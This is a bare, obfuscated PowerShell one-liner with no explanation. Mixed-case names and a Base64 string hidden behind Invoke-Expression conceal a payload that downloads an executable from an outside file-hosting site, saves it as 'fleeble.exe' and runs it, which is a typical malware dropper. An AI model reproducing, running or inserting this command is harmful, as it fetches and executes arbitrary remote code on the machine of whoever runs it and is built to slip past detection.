iex([sYSTeM.tExT.EncODIng]::UTf8.GETsTRiNG([sySTEm.cOnveRT]::frOmBase64STriNg('CihOZXctT2JqZWN0IFNZc3RFbS5uRXQuV2VCQ0xpZU50KS5kb3dOTG9BREZJbEUoJ2h0dHA6Ly9kZGw3LmRhdGEuaHUvZ2V0LzAvOTU1MjEwMy9QRklmZHAuZXhlJywnZmxlZWJsZS5leGUnKTtTdGFydC1Qcm9jZXNzICdmbGVlYmxlLmV4ZScKCg==')));exit

